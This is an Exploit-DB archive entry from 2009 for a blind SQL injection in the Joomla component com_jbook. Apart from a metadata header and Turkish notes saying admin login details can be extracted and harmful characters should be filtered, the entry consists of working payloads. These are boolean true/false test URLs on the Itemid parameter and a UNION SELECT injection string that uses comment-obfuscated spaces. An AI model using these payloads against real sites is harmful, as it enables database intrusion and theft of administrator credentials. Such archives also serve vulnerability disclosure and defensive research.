Joomla Component com_jbook Blind SQL-injection

2009-12-18T00:00:00
ID EDB-ID:10545
Type exploitdb
Reporter FL0RiX
Modified 2009-12-18T00:00:00

Description

Joomla Component com_jbook Blind SQL-injection. Webapps exploit for php platform

                                        
                                            #############################################################
#        Joomla Component com_jbook Blind SQL-injection Vulnerability                                      #
#############################################################

# author        : Fl0riX 
# Greetz    : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,F0rtys3v3n,BlackApple
# Name         : com_jbook

# Bug Type    : Blind SQL Injection

# Infection     : Admin login bilgileri al�nabilir.

# Demo Vuln.  :
TRUE(+)
� http:/server/index.php?option=com_jbook&Itemid=90 and 1=1
FALSE(-)
� http://server/index.php?option=com_jbook&Itemid=90 and 1=0

# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.

# Greez : KinqSqlZ Crew
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_jbook&Itemid=null/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

< -- bug code end of -- >